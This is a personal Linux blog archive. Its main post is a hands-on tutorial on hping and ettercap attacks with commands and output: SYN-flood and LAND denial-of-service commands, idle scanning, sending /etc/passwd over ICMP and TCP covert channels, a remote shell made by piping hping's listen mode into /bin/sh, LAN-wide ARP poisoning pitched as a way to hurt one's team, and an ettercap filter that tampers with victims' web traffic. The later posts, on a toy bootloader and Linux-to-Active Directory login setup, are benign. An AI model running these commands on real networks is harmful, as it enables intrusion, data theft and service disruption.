Monday, October 29, 2007

Monday, May 14, 2007

Hacking Tools and how to use them

Using HPING:__

1. HPing as port scanner:

[root@localhost root]#hping -I eth0 -S 10.17.139.104 -p 80
len=46 ip=192.168.10.1 flags=SA DF seq=0 ttl=64 id=11101 win=16080
rtt=2.7 ms
flags=SA means port is open
flags=RA means port is closed

2. Check sequentially:

[root@localhost root]# hping -I eth0 -S 192.168.10.1 -p ++79
HPING 192.168.10.1 (eth0 192.168.10.1): S set, 40 headers + 0 data
bytes
len=46 ip=192.168.10.1 sport=79 flags=RA seq=0 ttl=255 id=17491 win=0
rtt=2.4 ms
len=46 ip=192.168.10.1 sport=80 flags=SA DF seq=1 ttl=64 id=17492
win=16080 rtt=3.1 ms
len=46 ip=192.168.10.1 sport=81 flags=RA seq=2 ttl=255 id=17493 win=0
rtt=1.7 ms

3. Idle scanning:

Idle scanning needs a silent host, that has predictable "id" value in packets that are replied for an icmp ping. The victim's box is scanned by using this idle host as the source, and victim's ip as the destination. The idle host is scanned by this host and the "id" value is checked, to find out whether the particular port is open or not. This is anonymous scanning:

Identifying idle machine:

[root@localhost root]# hping -I eth0 -SA 
len=46 ip=192.168.10.1 flags=R seq=0 ttl=255 id=18106 win=0 rtt=0.4 ms
len=46 ip=192.168.10.1 flags=R seq=1 ttl=255 id=18107 win=0 rtt=0.4 ms
len=46 ip=192.168.10.1 flags=R seq=2 ttl=255 id=18108 win=0 rtt=0.4 ms

Scanning the victim box with idle machine as the source:

First run the following command on the victim's box

[root@localhost root]# hping -I eth0 -a 192.168.10.1 -S 192.168.10.33
-p ++20

Then scan the idle machine using this:

[root@localhost docs]# hping -I eth0 -r -S 192.168.10.1 -p 2000
len=46 ip=192.168.10.1 flags=RA seq=88 ttl=255 id=+1 win=0 rtt=1.8 ms
len=46 ip=192.168.10.1 flags=RA seq=89 ttl=255 id=+1 win=0 rtt=1.7 ms
len=46 ip=192.168.10.1 flags=RA seq=90 ttl=255 id=+1 win=0 rtt=1.8 ms
len=46 ip=192.168.10.1 flags=RA seq=91 ttl=255 id=+2 win=0 rtt=1.4 ms
(port 25)
id=+2 indicates particular port is open (here it is port 25)

4. Traceroute using any port in HPing:

[root@localhost root]# hping -I eth0 -z -t 6 -S mail.test.com -p 143
HPING mail.test.com (eth0 10.5.5.3): S set, 40 headers + 0 data bytes
TTL 0 during transit from ip=10.1.5.3
7: TTL 0 during transit from ip=10.1.5.3
8: TTL 0 during transit from ip=10.2.5.3
9: TTL 0 during transit from ip=10.3.5.3
10: TTL 0 during transit from ip=10.4.5.3
11: TTL 0 during transit from ip=10.6.5.3
once you reach the server ...
len=46 ip=10.5.5.3 flags=SA DF seq=33 ttl=47 id=0 win=5840 rtt=4341.3
ms

5. SYN DOS:

[root@localhost root]# hping -I eth0 -a  -S 
-p 80 -i u1000

6. LAND Attack:

A LAND attack was and still is a quite famous DOS attack that was quite effective on Windows NT in the old days. The aim of the attack is to construct a packet that connects a socket to it self. This ended up in using a lot of resources on the OS, causing a DOS.

[root@localhost root]# hping -S -a 10.10.10.10 -p 21 10.10.10.10
HPING 10.10.10.1 (eth0 10.10.10.1): S set, 40 headers + 0 data bytes

7. Packets with signatures. Up to now, we simply created packets, in fact IP/TCP headers. In the next example, a data payload is used. The examples shows how we can ‘misuse’ UDP services. This is a simple non-dangerous example, but I leave up to the imagination. Simply create a file containing a signature (Buffer Overflow, ...)

[root@localhost root]# cat /root/signature.sig
""BUFFER OVERFLOW""
[root@localhost root]#
What are we doing ?
The –2 switch will put hping is UDP mode, the –d switch specifies the
length of the data portion and together with the –E switch, the
signature is read from specified file.
[root@localhost rules]# hping -2 -p 7 192.168.10.33 -d 50 -E
/root/signature.sig
HPING 192.168.10.33 (eth0 192.168.10.33): udp mode set, 28 headers + 50
data bytes
len=78 ip=192.168.10.33 seq=0 ttl=128 id=24842 rtt=4.9 ms
len=78 ip=192.168.10.33 seq=1 ttl=128 id=24844 rtt=1.6 ms
len=78 ip=192.168.10.33 seq=2 ttl=128 id=24846 rtt=1.0 ms
--- 192.168.10.33 hping statistic ---
3 packets tramitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 1.0/2.5/4.9 ms
[root@localhost rules]#
[root@localhost root]# tcpdump -i eth0 -nX proto 17
tcpdump: listening on eth0
16:56:20.955167 192.168.10.44.1581 > 192.168.10.33.echo: udp 50
0x0000   4500 004e 1220 0000 4011 d2e1 c0a8 0a2c        E..N....@......,
0x0010   c0a8 0a21 062d 0007 003a db41 2222 4255        ...!.-...:.A""BU
0x0020   4646 4552 204f 5645 5246 4c4f 5722 220a        FFER.OVERFLOW"".
0x0030   0a00 0000 0000 0000 0000 0000 0000 0000        ................
0x0040   0000 0000 0000 0000 0000 0000 0000             ..............
16:56:20.960147 192.168.10.33.echo > 192.168.10.44.1581: udp 50
0x0000   4500 004e 5ec0 0000 8011 4641 c0a8 0a21        E..N^.....FA...!
0x0010   c0a8 0a2c 0007 062d 003a db41 2222 4255        ...,...-.:.A""BU
0x0020   4646 4552 204f 5645 5246 4c4f 5722 220a        FFER.OVERFLOW"".
0x0030   0a00 0000 0000 0000 0000 0000 0000 0000        ................
0x0040   0000 0000 0000 0000 0000 0000 0000             ..............

8. Transferring files via ICMP, UDP or TCP:

Run the following on the receiving end:

hping 192.168.10.66 --listen signature --safe --icmp

Run the following on the sending end:

[root@knoppix root]# hping 192.168.10.44 --icmp –d 100 --sign signature
--file /etc/passwd

TCPDump on receiving end gives:

tcpdump -nX -i
tcpdump: listening on eth0
15:21:31.271874 192.168.10.66 > 192.168.10.44: icmp: echo request
0x0000   4500 0080 60d9 0000 4001 83e5 c0a8 0a42        E...`...@......B
0x0010   c0a8 0a2c 0800 9df1 cf15 0000 7369 676e        ...,........sign
0x0020   6174 7572 6572 6f6f 743a 783a 303a 303a        atureroot:x:0:0:
0x0030   726f 6f74 3a2f 726f 6f74 3a2f 6269 6e2f        root:/root:/bin/
0x0040   6261 7368 0a64 6165 6d6f 6e3a 783a 313a        bash.daemon:x:1:
0x0050   313a                                           1:

9. Transferring a file via TCP:

[root@localhost root]# hping 192.168.10.66 --listen signature --safe
-p 22
hping2 listen mode
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[root@knoppix root]hping -p 22 d 100 --sign signature --file
/etc/passwd

This could be a way to create a full duplex channel across a stateless filter.

[root@localhost root]#hping 192.168.10.66  --listen signature --safe
-p 22
on the other site
[root@knoppix root]hping -SA -22 d 100 --sign signature --file
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[root@localhost root]# tcpdump -nX -i eth0 not host 192.168.10.33
tcpdump: listening on eth0
15:14:49.755553 arp who-has 192.168.10.50 tell 192.168.10.1
0x0000   0001 0800 0604 0001 0008 da10 0e44 c0a8        .............D..
0x0010   0a01 0000 0000 0000 c0a8 0a32 addf d404        ...........2....
0x0020   5010 f834 b458 0000 0101 050a addf             P..4.X........
15:14:57.813503 192.168.10.66.1636 > 192.168.10.44.ssh: S 926334897:926334997(100) ack
1257790585 win 512

10. HPING as a Trojan.

If hping can be started on the remote machine, you could use all the described techniques above to execute commands on the remote machine. An educational example with udp port 53.

[root@localhost root]# hping 192.168.10.66 --listen signature --safe --
udp -p 53 |/bin/sh
hping2 listen mode
amsn_received                       lib
readme.txt
anaconda-ks.cfg                     libfwbuilder-0.10.13-1.rh7.i386.rpm
report.html
avi                                 license.txt
sbin
CPsrsc-50-02.i386.rpm               linux-wlan-ng-0.1.16-pre5
scripts
...
on the other site
[root@knoppix root]# echo ls >test.cmd
[root@knoppix root]# hping 192.168.10.44 -p 53 -d 100 --udp --sign
siganature --file ./test.cmd

11. Even worse In this example, an apache server is running on a linux server. Somehow (this is for another tutorial) we managed to get hping started as follows.

[root@localhost root]# hping -I eth0 --listen signature -p 80 |/bin/sh
hping2 listen mode
amsn_received fwbuilder-pf-1.0.9-1.rh7.i386.rpm
nmap.txt signature.sig
anaconda-ks.cfg install.log
nsmail snmpd.txt
... scripts
on the other machine ...
With a simple netcat, we do the following. The command behind the
signature will be executed on the server, without crashing the services
or interfering.
[root@knoppix root]# echo "signaturels;" | nc 192.168.10.44 80

501 Method Not Implemented

Method Not Implemented

siganutels; to /index.html not supported.

Invalid method in request siganutels;

Apache/1.3.27 Server at localhost.localdomain Port
80

[root@localhost root]#

Using Ettercap

1. ARP Poisoning with Remote Browser plugin:

ettercap -T -Q -M arp:remote -i wlan0 /10.10.10.23/ // -P remote_browser

Perform  the  ARP  poisoning  against  the  gateway  and the host in the lan between 2 and 10. The ’remote’ option is needed to be able to sniff the remote traffic the hosts make              through the gateway.

ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/

2. How to discover Gateway using Ettercap:

Run ettercap and type p to load plugins. Then load the following plugin:

gw_discover

3. How to use NMAP to identify active hosts:

root@box:~# nmap -sP 10.10.10.*

4. How to identify whether ARP cache of victim has been poisoned or not:

Use plugin chk_poison. By now you must be knowing how to use plugins

5. Scan connections between two hosts:

ettercap -Ts 192.168.0.1 192.168.0.2

6. Use broadcast ping to scan the LAN:

ettercap -b

7. Scan packets entering or leaving a host at port 21,22 and 23:

ettercap -Ts /10.0.0.1/21,22,23

8. You are fedup of your team, and you really want to do something bad:

ettercap -T -M arp // //

9. A little advanced technique. How to trick another person's browser activities !

This one does not work with proxy enabled (Unfortunate)

i. Write the following into a file called ig.filter. Remember to replace "img src" with just "src" in the case of ESX Server's index page redirection !!!

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"your own path to your own jpg\" ");
   replace("IMG SRC=", "img src=\"your own path to your own jpg\" ");
   msg("Filter Ran.\n");
}

ii. Compile it using etterfilter as follows:

etterfilter ig.filter -o ig.ef

iii. Then what else ! Run it !!!

ettercap -T -q -F ig.ef -M ARP /10.17.139.104/ //

Tuesday, December 12, 2006

Infinite Machine !!!

http://www.chiark.greenend.org.uk/~sgtatham/infinity.html

Hi guys,
Have you ever tried doing stuff like this :

1. You have an ISO image of a live cd linux distro in the hdd in a partition
2. You try to make grub use the ISO image in the partition to boot it to the live cd

If you still don't get it, go here :

http://www.knoppix.net/forum/viewtopic.php?t=14680

Saturday, November 11, 2006

Yes,
Now it is one step ahead

A little kernel (sorry it is not right to call it a kernel) program that goes to protected mode, and prints a string. Done using nasm and c . Here it is

%define CS_ACCES 10011011b
%define DS_ACCES 10010011b
[bits 16]
[org 0x0] ; Begins at 0x0:Whatever you define next

jmp boot

%include "GDT.INC"

boot:
mov ax,0x07C0 ; Define the beginning of boot at 0x0000:0x07c0
mov ds,ax
mov es,ax
mov ax,0x8000 ; Define Stack
mov ss,ax
mov sp,0xf000 ; Stack begins at 0xf000 and fills from there

; Read the kernel binary from floppy to your memory location
; at 0x100:0x0000
; In real mode 0x7c00 = 0x7c0:0 or 0x7c0:0 = 0x07c0 shifted left once + 0
; so 0x1000 = 0x100:0 = 0x0100 shifted left once + 0
; 0x1000 = es, 0x0000 = bx
; First restart the motor

xor ax,ax
int 0x13

push es ; es has stack defined

mov ax,0x100
mov es,ax
mov bx,0

mov ah,2
mov al,30
mov ch,0
mov cl,2
mov dh,0
mov dl,0
int 0x13

pop es; Now es holds stack addresss

; Fill in the GDT now, before doing the lgdt
; Because GDT is all 0's now

descInit 0,0xFFFFF,CS_ACCES,1101b,gdt_cs
descInit 0,0xFFFFF,DS_ACCES,1101b,gdt_ds

; Before doing lgdt, we must supply two parameters to lgdt
; One is the limit, and the other is the linear address of GDT
; Refer to the GDT structure below

; Size of gdt = gdtend - gdt

mov ax, gdtend
mov bx, gdt
sub ax,bx
mov word [gdtptr], ax

; Linear address

xor ax,ax ; Clear eax
mov ax,ds ; Move segment 0x7c0 to ax
mov bx,gdt; Move offset to bx
call calcadr; Calculate linear address and store it in ecx
mov dword [gdtptr+2], ecx ; Move it to gdtptr

; Load gdt using lgdt. Disable interrupts before that

cli
lgdt[gdtptr]

; Move to protected mode. Set cr0's first bit to 1 by oring it

mov eax,cr0
or ax,1
mov cr0,eax

; Re define segments and offsets in protected mode
; cs -> as defined by gdt ie., using jmp instruction
; Define ds -> as the pointer to the data segment register's
; displacement with gdt, ie 0x10

jmp next

next:
mov ax,0x10
mov ds,ax
mov es,ax
mov fs,ax
mov gs,ax
mov ss,ax ; Stack also begins at data segment

mov esp,0x9f000 ; Stack begins filling at this address

; code segment pointed by cs register at a displacement of 0x8 bytes
; from the beginning of gdt
; Now jump to the location of kernel binary w.r.t. code segment

; protected mode segmented address = cs:0x1000

jmp dword 0x8:0x1000

end:
jmp end ; Just in case it slips the earlier step !

; Definition of Zeroed out GDT
; GDT initially has 0's in all places
; GDT has 3, 8 byte segment descriptors defined
; The three are, NULL, Code segment and Data segment descriptor
; Remember the following are all variables

gdt:
gdt_null:
dw 0,0,0,0
gdt_cs:
dw 0,0,0,0
gdt_ds:
dw 0,0,0,0
gdtend:

; gdtptr is supposed to be passed to lgdt. It has been zeroed in the beginning

gdtptr:
dw 0x0000 ; 16 bit size of GDT
dd 0 ; 32 bit linear address of GDT

; Fill the rest of 510 bytes with NOP (0x144)

times 510-($-$$) db 144

dw 0xaa55 ; The signature of boot sector

void _start(void) {
main();
}

int main(void){
unsigned char *video = (unsigned char *) 0xb8000;

char *string = "Kernel loaded";

while (*string !=0)
{
*video = *string;
*video++;
*video = 0x07;
*video++;
*string++;
};
while(1);
}

compile as

nasm -f bin -o boot boot.asm

gcc -w -c kernel.c -o kernel.o
ld -Ttext 0x1000 --oformat binary kernel.o -o kernel

cat boot kernel >

use bochs and boot

Wednesday, October 18, 2006

Found some interesting link on how to compile kde4

http://arun.wordpress.com/tag/suse/misc/

Thursday, August 17, 2006

Found recently while i was facing a problem, that many people find it difficult to find a proper solution to give linux clients easy logins to AD via AD username mappings. Here are the steps :

Basics:
-------

Active Directory has an LDAP Backend which serves
for username lookups

Active Directory uses Kerberos Authentication Mechanism
to grant access to Users

Linux Client (if configured as a client to AD)
has to perform the following :

1. Get User Name (as an LDAP Client) from AD's LDAP Server
2. Authenticate a user using Kerberos Authentication Mechanism
to the Kerberos Server at Windows end

To do the above, we can use two methods; one, use nss_ldap
along with kerberos and, two, use winbind

The client should have nss_ldap built in, so i am giving
a good example of how to use nss_ldap to authenticate to an AD

Windows Server End:
-------------------

1. Create an Active Directory using the normal method

2. Install Microsoft Services For Unix 3.5.
While installing, give options as "Local Username Mapping Server"
and subsequently "Network Information Services"

3. Create a Basic LDAP User for LDAP Bind :

i. Create a Normal User
ii. Define User cannot change password and Password never expires
iii. After the user has been created, you need to set the
UNIX attributes for the user. Give it the UID and GID 499,
with home directory /dev/null and shell /bin/false.

4. Define a Share :

i. Go to start-settings->control panel->
administrative tools->domain controller security policies

ii. Then local policies->security options->Digitally sign
client/server communications (always).
Check Define this policy and select the Disabled radio button,
then click apply then ok.

iii. Create a folder c:\share and share it,
call it "share" Create a normal user and
assign his home folder under share.

5. Active Directory object management

i. Open the Active Directory Users and Groups management tool.

a.) Modify a group object to function as a POSIX group.
b.) Right-click on the user group for assignment of a GID.
c.) Click on the Unix Attributes tab.
d.) Populate the NIS Domain dropdown and the GID number as appropriate.

ii. Modify a user object to function as a POSIX user.

a.) Locate and activate the tab that says Unix Settings.
b.) Under Unix Settings, set the UID and GID for the user,
as well as the home directory location
(on the Linux filesystem /home/). Note: You will need
to ensure that the directory exists with the appropriate
user object having access to the directory.
c.) Reset the user's password. This causes the AD password
and the Unix password attributes to synchronize.

iii. Add the user as a Unix member of the group.

a.) After you have added the user as a Unix user,
you will also need to come back to the group properties
and add the user as a member on the Unix Attributes tab.
Otherwise, the user will not be populated in the msSFU30PosixMember
attribute.

6. Allowing Anonymous Searches in Active Directory

i. On your Windows 2000 Active Directory server, run the
Active Directory Users and Groups administration tool.
ii. Select the top level of the directory from the tree
view in the left hand panel, and right click. A menu will appear.
Select the first item, which should be "Delegate Control..."
iii. Click "Next"
iv. In the next window, titled "Users or Groups", click "Add ..."
v. In the next list, select "ANONYMOUS LOGON" and click "Add".
You may also need to select "Everyone" and the "Guests" group,
depending on how you have Active Directory configured.
Click OK when this is done.
vi. Click "Next"
vii. Select "Create a custom task to delegate" and click "Next".
viii. Click "Next"
ix. In the next list, select "Read". "Read All Properties" will
be selected at the same time. Click "Next" when this is done.
x Click "Finish".

On the Linux Client End:
----------------------

1. Edit /etc ldap.conf and enter the following :

# @(#)$Id: ldap.conf,v 1.27 2003/01/17 21:37:12 lukeh Exp $
#
# This is the configuration file for the LDAP nameservice
# switch library and the LDAP PAM module.
#
# PADL Software
# http://www.padl.com
#

# Your LDAP server. Must be resolvable without using LDAP.
# Multiple hosts may be specified, each separated by a
# space. How long nss_ldap takes to failover depends on
# whether your LDAP client library supports configurable
# network or connect timeouts (see bind_timelimit).
host

# The distinguished name of the search base.
base dc=,dc=com

binddn cn=Administrator,cn=Users,dc=,dc=com
bindpw

ssl no
pam_password ad

nss_map_objectclass posixAccount User
nss_map_objectclass shadowAccount User
nss_map_objectclass posixGroup Group

nss_map_attribute uid sAMAccountName
nss_map_attribute uidNumber msSFU30uidNumber
nss_map_attribute gidNumber msSFU30gidNumber
nss_map_attribute gecos cn
nss_map_attribute homeDirectory msSFU30homeDirectory
nss_map_attribute loginShell msSFU30loginShell

pam_login_attribute sAMAccountName
pam_filter objectclass=User
nss_base_passwd cn=Users,dc=,dc=com

2. /etc/pam.d/system-auth should contain the following :

auth required /lib/security/$ISA/pam_env.so
auth sufficient /lib/security/$ISA/pam_unix.so likeauth nullok
auth sufficient /lib/security/$ISA/pam_ldap.so use_first_pass
auth required /lib/security/$ISA/pam_deny.so

account required /lib/security/$ISA/pam_unix.so
account [default=bad success=ok user_unknown=ignore service_err=ignore system_err=ignore] /lib/security/$ISA/pam_ldap.so
account sufficient /lib/security/pam_localuser.so

password required /lib/security/$ISA/pam_cracklib.so retry=3 type=
password sufficient /lib/security/$ISA/pam_unix.so nullok use_authtok md5 shadow
password sufficient /lib/security/$ISA/pam_ldap.so use_authtok
password required /lib/security/$ISA/pam_deny.so

session required /lib/security/$ISA/pam_limits.so
session required /lib/security/$ISA/pam_unix.so
session optional /lib/security/$ISA/pam_ldap.so

3. /etc/nsswitch.conf should contain the following:

passwd files ldap
shadow files ldap
group files ldap

4. Enter the following in /etc/resolv.conf

nameserver
search

5. Kill the firewall / ( Or open the right ports ! ) I am too lazy here to find out the ports !!!

6. do an

ldapsearch -x "" from the client

7. If the above command results in output, you have it !

Do an ssh from some other client and your ad username logins will work !

Tuesday, July 25, 2006

Hi,
Some peculiar problem with FC5 with ldap server installed in it. It is not possible to start the system message bus (SMB). This even happens when authconfig is configured for an LDAP client. The solution (weird, but temporarily works !), was found in found in Fedora Forum :

1. selinux=0 in grub.conf
2. Remove mention of ldap and ldaps in /etc/nsswitch.conf (wierd, in FC4 they are there but named starts fine).
3. Remove the same from /etc/sysconfig/authconfig
3. Sent *.* to /dev/tty12 in /etc/syslog.conf helped debugged the problem

The link is : http://www.fedoraforum.org/forum/showthread.php?t=99396

Any more ideas expected !

Linux